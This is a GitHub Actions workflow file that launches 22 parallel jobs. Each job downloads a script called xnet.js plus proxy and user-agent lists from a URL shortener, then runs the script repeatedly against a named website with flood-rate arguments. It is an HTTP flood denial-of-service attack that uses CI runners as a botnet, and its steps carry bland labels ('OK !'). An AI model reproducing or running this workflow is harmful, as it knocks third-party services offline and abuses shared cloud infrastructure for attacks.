name: Ubuntu VDS 50 saniye pro.j

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 22
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22]


    steps:
      - name: OK !
        run: |
          wget https://curl.by/i5xqE/xnet.js
          wget https://curl.by/IJ_Lv/fres.txt
          wget https://curl.by/FVlpp/ua.txt
          npm i header-generator
          chmod +x xnet.js
          PIDS=()
          for i in {1..4}; do
            timeout 105 node xnet.js https://antiddos.ooguy.com/ 100 64 10
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 105
        
      - name: OK !
        run: sudo reboot
